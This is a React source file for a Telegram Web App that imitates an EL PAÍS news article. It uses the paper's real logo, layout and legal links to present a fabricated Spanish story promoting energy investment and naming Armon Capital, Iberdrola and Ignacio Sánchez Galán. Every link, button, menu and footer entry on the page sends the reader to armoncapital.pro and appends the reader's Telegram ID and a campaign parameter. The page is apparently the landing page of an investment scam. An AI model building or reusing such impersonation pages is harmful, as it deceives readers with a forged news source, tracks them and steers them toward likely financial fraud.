import React, { useEffect, useState } from 'react';
import ReactMarkdown from 'react-markdown';
import remarkGfm from 'remark-gfm';
import './App.css';
import {useUser} from "./hooks/useUser";

export const TARGET_URL = 'https://armoncapital.pro/';
// export const TARGET_URL = 'https://elpais.com/';


const getTargetUrl = () => {
    const tg = window.Telegram?.WebApp;
    const user = tg?.initDataUnsafe?.user;
    const startParam = tg?.initDataUnsafe?.start_param;

    const url = new URL(TARGET_URL);

    if (user) {
        const params = {
            tgId: user.id,
            /*isBot: user.is_bot,
            firstName: user.first_name,
            lastName: user.last_name,
            username: user.username,
            languageCode: user.language_code,
            isPremium: user.is_premium,
            allowsWriteToPm: user.allows_write_to_pm,*/
            startParam,
        };

        Object.entries(params).forEach(([key, value]) => {
            if (value !== undefined && value !== null) {
                url.searchParams.set(key, String(value));
            }
        });
    }

    return url.toString();
};



// Метаданные статьи. Основной текст хранится в public/article.md.


const ARTICLE = {
    section: 'Economía',
    category: 'ENERGÍA E INVERSIONES',

    title: 'Energía que nadie nota… y dinero que solo unos pocos están cogiendo',

    subtitle: 'El crecimiento del sector energético abre nuevas oportunidades de inversión, mientras la mayoría de los ciudadanos sigue viendo la electricidad únicamente como un gasto.',

    image: './1.jpg',

    imageAlt: 'Infraestructuras de energía renovable y nuevas oportunidades de inversión en el sector energético',

    caption: 'El desarrollo de las energías renovables impulsa nuevas oportunidades de participación en el mercado energético.',

    photographer: 'IMAGEN ILUSTRATIVA',

    author: 'REDACCIÓN DE ECONOMÍA',

    avatar: '',

    location: 'Madrid',

    date: '14 OCT 2026 - 09:30 CEST',

    dateTime: '2026-10-14T09:30:00+02:00',

    biography: 'Información y análisis sobre el sector energético, los mercados de inversión y las principales tendencias económicas.',

    premium: false,
};



const NAV = [
    'ESPAÑA', 'RESULTADOS', 'PP', 'PSOE', 'VOX',
    'SUMAR', 'ERC', 'BILDU', 'PNV', 'PODEMOS', 'FRENTE AMPLIO',
];

const TAGS = [
    'Energía',
    'Sector energético',
    'Energías renovables',
    'Inversiones',
    'Mercados financieros',
    'Iberdrola',
    'Ignacio Sánchez Galán',
    'Armon Capital',
    'Electricidad',
    'Economía española',
    'Tecnología energética',
    'España',
];

const RELATED = [
    'El contexto de la noticia: las claves para entender lo ocurrido',
    'Las preguntas y respuestas sobre este tema',
];

const LATEST = [
    'Toda la información y las claves de la jornada',
    'La actualidad, explicada por nuestros periodistas',
    'Las historias que marcan el día',
    'El análisis de las últimas noticias',
];

function Icon({ name, size = 20 }) {
    const paths = {
        menu: (
            <path d="M3 5h18M3 12h18M3 19h18" />
        ),
        close: (
            <path d="m5 5 14 14M19 5 5 19" />
        ),
        user: (
            <>
                <circle
                    cx="12"
                    cy="7"
                    r="4"
                    fill="currentColor"
                    stroke="none"
                />
                <path
                    d="M4 22v-2a8 7 0 0 1 16 0v2Z"
                    fill="currentColor"
                    stroke="none"
                />
            </>
        ),
        share: (
            <path d="M12 16V2m-5 5 5-5 5 5M5 12v9h14v-9" />
        ),
        comment: (
            <path d="M3 3h18v14H9l-6 4Z" />
        ),
        bookmark: (
            <path d="M6 3h12v19l-6-4-6 4Z" />
        ),
        chevron: (
            <path d="m6 9 6 6 6-6" />
        ),
        whatsapp: (
            <path fill="currentColor" stroke="none" d="M20.52 3.48A11.86 11.86 0 0 0 12.04 0C5.46 0 .1 5.35.1 11.93c0 2.1.55 4.16 1.6 5.97L0 24l6.26-1.64a11.93 11.93 0 0 0 5.78 1.47h.01c6.58 0 11.94-5.35 11.94-11.93a11.86 11.86 0 0 0-3.47-8.42ZM12.05 21.8a9.9 9.9 0 0 1-5.04-1.38l-.36-.22-3.72.98.99-3.63-.24-.37a9.86 9.86 0 0 1-1.51-5.25c0-5.47 4.45-9.92 9.88-9.92a9.84 9.84 0 0 1 7.01 2.91 9.84 9.84 0 0 1 2.9 7.02c0 5.47-4.45 9.86-9.91 9.86Zm5.43-7.4c-.3-.15-1.76-.87-2.03-.97-.27-.1-.47-.15-.67.15-.2.3-.77.97-.94 1.17-.17.2-.35.22-.64.07-.3-.15-1.26-.46-2.4-1.48-.9-.8-1.5-1.77-1.67-2.06-.17-.3-.02-.46.13-.61.13-.13.3-.35.45-.52.15-.17.2-.3.3-.5.1-.2.05-.37-.03-.52-.07-.15-.67-1.61-.92-2.21-.24-.58-.49-.5-.67-.51h-.57c-.2 0-.52.07-.79.37-.27.3-1.04 1.02-1.04 2.48s1.07 2.88 1.22 3.08c.15.2 2.1 3.2 5.08 4.48.71.31 1.27.49 1.7.63.71.22 1.35.19 1.86.12.57-.08 1.76-.72 2.01-1.41.25-.7.25-1.29.17-1.41-.07-.13-.27-.2-.57-.35Z" />
        ),
        facebook: (
            <path fill="currentColor" stroke="none" d="M13.5 22v-9h3l.5-3.5h-3.5V7.25c0-1 .3-1.75 1.75-1.75H17V2.3c-.3-.04-1.35-.13-2.6-.13-2.6 0-4.4 1.58-4.4 4.48V9.5H7V13h3v9Z" />
        ),
        x: (
            <path fill="currentColor" stroke="none" d="M18.9 2H22l-6.78 7.75L23.2 22h-6.25l-4.9-7.43L5.55 22H2.4l7.94-9.08L2.7 2h6.4l4.43 6.77L18.9 2Zm-1.1 18h1.73L8.16 3.89H6.3L17.8 20Z" />
        ),
        instagram: (
            <><rect x="3" y="3" width="18" height="18" rx="5" /><circle cx="12" cy="12" r="4" /><circle cx="17.5" cy="6.5" r="1" fill="currentColor" stroke="none" /></>
        ),
        plus: (<path d="M12 5v14M5 12h14" />),
        google: (
            <g stroke="none">
                <path fill="#4285F4" d="M21.6 12.23c0-.71-.06-1.39-.18-2.05H12v3.88h5.38a4.6 4.6 0 0 1-2 3.02v2.51h3.24c1.9-1.75 2.98-4.32 2.98-7.36Z" />
                <path fill="#34A853" d="M12 22c2.7 0 4.96-.9 6.62-2.41l-3.24-2.51c-.9.6-2.05.97-3.38.97-2.6 0-4.8-1.76-5.59-4.12H3.06v2.59A10 10 0 0 0 12 22Z" />
                <path fill="#FBBC05" d="M6.41 13.93a6 6 0 0 1 0-3.86V7.48H3.06a10 10 0 0 0 0 9.04l3.35-2.59Z" />
                <path fill="#EA4335" d="M12 5.95c1.47 0 2.79.51 3.83 1.51l2.87-2.87A9.6 9.6 0 0 0 12 2a10 10 0 0 0-8.94 5.48l3.35 2.59C7.2 7.71 9.4 5.95 12 5.95Z" />
            </g>
        ),
        mail: (
            <>
                <rect x="2" y="4" width="20" height="16" rx="1" />
                <path d="m2 5 10 8L22 5" />
            </>
        ),
    };

    return (
        <svg
            className={`ep-icon ep-icon-${name}`}
            focusable="false"
            width={size}
            height={size}
            viewBox="0 0 24 24"
            fill="none"
            stroke="currentColor"
            strokeWidth="1.6"
            strokeLinecap="round"
            strokeLinejoin="round"
            aria-hidden="true"
        >
            {paths[name] || paths.share}
        </svg>
    );
}

function Masthead() {
    return (
        <img
            className="ep-logo"
            src="https://static.elpais.com/dist/resources/images/logos/primary/el-pais-50.svg"
            alt="EL PAÍS · 50"
            width="175"
            height="31"
        />
    );
}

function MarkdownImage({ alt, src, title }) {
    const [failed, setFailed] = useState(false);

    return (
        <span className="ep-md-image">
      {failed ? (
          <span className="ep-image-fallback">
          {alt || 'Imagen no disponible'}
        </span>
      ) : (
          <img
              src={src}
              alt={alt || ''}
              loading="lazy"
              onError={() => setFailed(true)}
          />
      )}

            {title && <span className="ep-md-caption">{title}</span>}
    </span>
    );
}







export function App({
                        article = ARTICLE,
                        articleUrl = '/article.md',
                    }) {

    useUser();
    const targetUrl = getTargetUrl();

    const data = { ...ARTICLE, ...article, author: ARTICLE.author, avatar: '', biography: ARTICLE.biography };

    const [markdown, setMarkdown] = useState('');
    const [loadState, setLoadState] = useState('loading');
    const [shareOpen, setShareOpen] = useState(false);
    const [saved, setSaved] = useState(false);
    const [largeText, setLargeText] = useState(false);
    const [bioOpen, setBioOpen] = useState(false);
    const [tagsOpen, setTagsOpen] = useState(false);
    const [commentsOpen, setCommentsOpen] = useState(false);
    const [photoFailed, setPhotoFailed] = useState(false);
    const [notice, setNotice] = useState('');
    const [ctaVisible, setCtaVisible] = useState(false);

    useEffect(() => {
        const updateVisibility = () => setCtaVisible(window.scrollY > 1000);
        updateVisibility();
        window.addEventListener('scroll', updateVisibility, { passive: true });
        return () => window.removeEventListener('scroll', updateVisibility);
    }, []);

    useEffect(() => {
        const controller = new AbortController();

        setLoadState('loading');

        fetch(articleUrl, { signal: controller.signal })
            .then(response => {
                if (
                    !response.ok ||
                    response.headers.get('content-type')?.includes('text/html')
                ) {
                    throw new Error('Markdown unavailable');
                }

                return response.text();
            })
            .then(text => {
                setMarkdown(text);
                setLoadState('ready');
            })
            .catch(error => {
                if (error.name !== 'AbortError') {
                    setLoadState('error');
                }
            });

        return () => controller.abort();
    }, [articleUrl]);

    useEffect(() => {
        setPhotoFailed(false);
    }, [data.image]);

    useEffect(() => {
        if (!notice) return;

        const timer = setTimeout(() => setNotice(''), 3200);

        return () => clearTimeout(timer);
    }, [notice]);

    const currentUrl = () => targetUrl;

    const copyLink = async () => {
        try {
            await navigator.clipboard.writeText(currentUrl());
            setNotice('Enlace copiado');
        } catch {
            setNotice('No se pudo copiar el enlace');
        }
    };

    return (
        <div className="ep-page">
            <a className="ep-skip" href="#ep-article">
                Ir al contenido
            </a>

            <header className="ep-header">
                <a
                    className="ep-icon-button ep-menu-button"
                    aria-label="Ir al sitio oficial"
                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                >
                    <Icon name="menu" size={28} />
                </a>

                <a
                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                    className="ep-brand"
                    aria-label="EL PAÍS, portada"
                >
                    <Masthead />
                </a>

                <a
                    className="ep-subscribe"
                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                >
                    SUSCRÍBETE
                </a>

                <a
                    className="ep-icon-button ep-login"
                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                    aria-label="Iniciar sesión"
                >
                    <Icon name="user" />
                </a>
            </header>

            <section className="ep-section" aria-label="Sección">
                <h2>
                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                        {data.section}
                    </a>
                </h2>

                <nav className="ep-topics" aria-label="Temas de la sección">
                    {NAV.map((topic, index) => (
                        <React.Fragment key={topic}>
                            {index > 0 && <span aria-hidden="true">·</span>}

                            <a
                                href={targetUrl} target="_blank" rel="noopener noreferrer"
                            >
                                {topic}
                            </a>
                        </React.Fragment>
                    ))}
                </nav>
            </section>

            <main id="ep-article">
                <article>
                    <div className="ep-article-heading">
                        <a
                            className="ep-kicker"
                            href={targetUrl} target="_blank" rel="noopener noreferrer"
                        >
                            {data.category} &gt;
                        </a>

                        <h1>
                            {data.premium && (
                                <span
                                    className="ep-premium"
                                    aria-label="Contenido para suscriptores"
                                >
                  E
                </span>
                            )}
                            {data.title}
                        </h1>

                        {data.subtitle && (
                            <p className="ep-subtitle">{data.subtitle}</p>
                        )}
                    </div>

                    {data.image && (
                        <figure className="ep-hero">
                            {photoFailed ? (
                                <div className="ep-image-fallback">
                                    {data.imageAlt}
                                </div>
                            ) : (
                                <img
                                    src={data.image}
                                    alt={data.imageAlt}
                                    fetchPriority="high"
                                    onError={() => setPhotoFailed(true)}
                                />
                            )}

                            <figcaption>
                                {data.caption} <span>{data.photographer}</span>
                            </figcaption>
                        </figure>
                    )}

                    <div className="ep-article-details">
                        <div className="ep-author-line">
                            {data.avatar && (
                                <img
                                    src={data.avatar}
                                    alt=""
                                    width="32"
                                    height="32"
                                />
                            )}

                            <a href={targetUrl} target="_blank" rel="noopener noreferrer">{data.author}</a>
                        </div>

                        <p className="ep-dateline">
                            {data.location} -{' '}
                            <time dateTime={data.dateTime}>{data.date}</time>
                        </p>

                        <div className="ep-tools">
                            <div className="ep-share-icons">
                                {['whatsapp', 'facebook', 'x'].map(name => (
                                    <a
                                        key={name}
                                        href={targetUrl} target="_blank" rel="noopener noreferrer"
                                        aria-label={`Compartir en ${
                                            name === 'x' ? 'X' : name
                                        }`}
                                    >
                                        <Icon name={name} />
                                    </a>
                                ))}

                                <button
                                    className="ep-icon-button"
                                    aria-label="Más opciones para compartir"
                                    aria-expanded={shareOpen}
                                    onClick={() => setShareOpen(!shareOpen)}
                                >
                                    <Icon name="share" />
                                </button>
                            </div>

                            <div className="ep-reading-tools">
                                <button
                                    className="ep-icon-button"
                                    aria-label={
                                        saved
                                            ? 'Quitar de guardados'
                                            : 'Guardar artículo'
                                    }
                                    aria-pressed={saved}
                                    onClick={() => {
                                        setSaved(!saved);
                                        setNotice(
                                            saved
                                                ? 'Artículo quitado de guardados'
                                                : 'Artículo guardado durante esta sesión'
                                        );
                                    }}
                                >
                                    <Icon name="bookmark" />
                                </button>

                                <button
                                    className="ep-font-button"
                                    aria-label="Cambiar tamaño del texto"
                                    aria-pressed={largeText}
                                    onClick={() => setLargeText(!largeText)}
                                >
                                    Aa
                                </button>

                                <a
                                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                                    aria-label="Ir a los comentarios"
                                >
                                    <Icon name="comment" />
                                </a>
                            </div>
                        </div>

                        {shareOpen && (
                            <div className="ep-share-panel">
                                <button onClick={copyLink}>Copiar enlace</button>

                                <a
                                    href={targetUrl} target="_blank" rel="noopener noreferrer"
                                >
                                    <Icon name="mail" size={16} />
                                    {' '}Correo electrónico
                                </a>
                            </div>
                        )}

                        <a
                            className="ep-google"
                            href={targetUrl} target="_blank" rel="noopener noreferrer"
                        >
                            <Icon name="google" />
                            Añadir EL PAÍS en Google
                            <span aria-hidden="true"><Icon name="plus" /></span>
                        </a>
                    </div>

                    <div
                        className={`ep-body ${
                            largeText ? 'ep-body-large' : ''
                        }`}
                        aria-busy={loadState === 'loading'}
                    >
                        {loadState === 'loading' && (
                            <p className="ep-status" role="status">
                                Cargando artículo…
                            </p>
                        )}

                        {loadState === 'error' && (
                            <p className="ep-status" role="alert">
                                No se ha podido cargar el artículo. Comprueba que
                                el archivo article.md está en la carpeta public.
                            </p>
                        )}

                        {loadState === 'ready' && (
                            <ReactMarkdown
                                remarkPlugins={[remarkGfm]}
                                components={{
                                    img: MarkdownImage,
                                    a: ({ children }) => (
                                        <a
                                            href={targetUrl} target="_blank" rel="noopener noreferrer"
                                        >
                                            {children}
                                        </a>
                                    ),
                                }}
                            >
                                {markdown}
                            </ReactMarkdown>
                        )}
                    </div>

                    <section
                        className="ep-author-box ep-inset"
                        id="ep-author"
                    >
                        <h2 className="ep-block-title">SOBRE LA FIRMA</h2>

                        <div className="ep-bio-heading">
                            {data.avatar && (
                                <img
                                    src={data.avatar}
                                    alt=""
                                    width="56"
                                    height="56"
                                />
                            )}

                            <div>
                                <h3>Redacción de Economía</h3>

                                <button
                                    aria-expanded={bioOpen}
                                    onClick={() => setBioOpen(!bioOpen)}
                                >
                                    VER BIOGRAFÍA
                                    <Icon name="chevron" size={13} />
                                </button>
                            </div>
                        </div>

                        {bioOpen && (
                            <p className="ep-biography">{data.biography}</p>
                        )}
                    </section>

                    <aside className="ep-newsletter ep-inset">
                        <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                            <Icon name="mail" size={25} />

                            <span>
                Recibe EL PAÍS de la mañana con el mejor análisis
                de la actualidad <b>›</b>
              </span>
                        </a>

                        <div className="ep-follow">
                            <span>Sigue a EL PAÍS</span>

                            <a
                                href={targetUrl} target="_blank" rel="noopener noreferrer"
                                aria-label="EL PAÍS en Facebook"
                            >
                                <Icon name="facebook" />
                            </a>

                            <a
                                href={targetUrl} target="_blank" rel="noopener noreferrer"
                                aria-label="EL PAÍS en Instagram"
                            >
                                <Icon name="instagram" />
                            </a>

                            <a
                                href={targetUrl} target="_blank" rel="noopener noreferrer"
                                aria-label="EL PAÍS en X"
                            >
                                <Icon name="x" />
                            </a>
                        </div>
                    </aside>

                    <section
                        className="ep-comments ep-inset"
                        id="ep-comments"
                    >
                        <button
                            aria-expanded={commentsOpen}
                            onClick={() => setCommentsOpen(!commentsOpen)}
                        >
                            <strong>COMENTARIOS</strong>

                            <span>
                IR A LOS COMENTARIOS
                <Icon name="chevron" size={14} />
              </span>
                        </button>

                        {commentsOpen && (
                            <p>
                                Los comentarios todavía no están habilitados
                                en esta página.
                            </p>
                        )}

                        <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                            Normas ›
                        </a>
                    </section>

                    <section className="ep-related ep-inset">
                        <h2 className="ep-block-title">MÁS INFORMACIÓN</h2>

                        {RELATED.map(title => (
                            <div className="ep-related-item" key={title}>
                                <h3>
                                    <a
                                        href={targetUrl} target="_blank" rel="noopener noreferrer"
                                    >
                                        {title}
                                    </a>
                                </h3>

                                <p>REDACCIÓN | MADRID</p>
                            </div>
                        ))}
                    </section>

                    <section className="ep-tags ep-inset">
                        <button
                            className="ep-block-title"
                            aria-expanded={tagsOpen}
                            onClick={() => setTagsOpen(!tagsOpen)}
                        >
                            ARCHIVADO EN
                            <Icon name="chevron" size={16} />
                        </button>

                        <div className={tagsOpen ? '' : 'ep-tags-collapsed'}>
                            {TAGS.map((tag, index) => (
                                <React.Fragment key={tag}>
                                    {index > 0 && ' · '}
                                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">{tag}</a>
                                </React.Fragment>
                            ))}
                        </div>
                    </section>

                    <div className="ep-trust ep-inset">
                        <p>
                            Se adhiere a los criterios de{' '}
                            <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                                The Trust Project
                            </a>{' '}
                            <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                                Más información
                            </a>
                        </p>

                        <p>
                            Si está interesado en licenciar este contenido,
                            pinche{' '}
                            <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                                aquí
                            </a>
                        </p>
                    </div>
                </article>

                <aside className="ep-bottom-news ep-inset">
                    <h2 className="ep-block-title">ÚLTIMAS NOTICIAS</h2>

                    {LATEST.map((title, index) => (
                        <div className="ep-latest-item" key={title}>
                            <time>{`21:${31 - index * 7}`}</time>

                            <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                                {title}
                            </a>
                        </div>
                    ))}

                    <h2 className="ep-block-title ep-most-title">
                        LO MÁS VISTO
                    </h2>

                    <ol className="ep-most-read">
                        {[
                            ...LATEST,
                            'Reportajes, entrevistas y nuevas perspectivas',
                        ].map(title => (
                            <li key={title}>
                                <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                                    {title}
                                </a>
                            </li>
                        ))}
                    </ol>
                </aside>
            </main>

            <footer className="ep-footer">
                <a href={targetUrl} target="_blank" rel="noopener noreferrer" aria-label="EL PAÍS, portada"><Masthead /></a>
                <p>© EL PAÍS</p>

                <nav aria-label="Información legal">
                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                        Aviso legal
                    </a>

                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                        Política de privacidad
                    </a>

                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                        Política de cookies
                    </a>

                    <a href={targetUrl} target="_blank" rel="noopener noreferrer">
                        Contacto
                    </a>
                </nav>
            </footer>

            <a
                className={`ep-sticky-cta${ctaVisible ? ' ep-sticky-cta-visible' : ''}`}
                href={targetUrl} target="_blank" rel="noopener noreferrer"
                aria-hidden={!ctaVisible}
                tabIndex={ctaVisible ? 0 : -1}
            >
                Ir al sitio oficial →
            </a>

            {notice && (
                <div className="ep-toast" role="status">
                    {notice}
                </div>
            )}
        </div>
    );
}

export default App;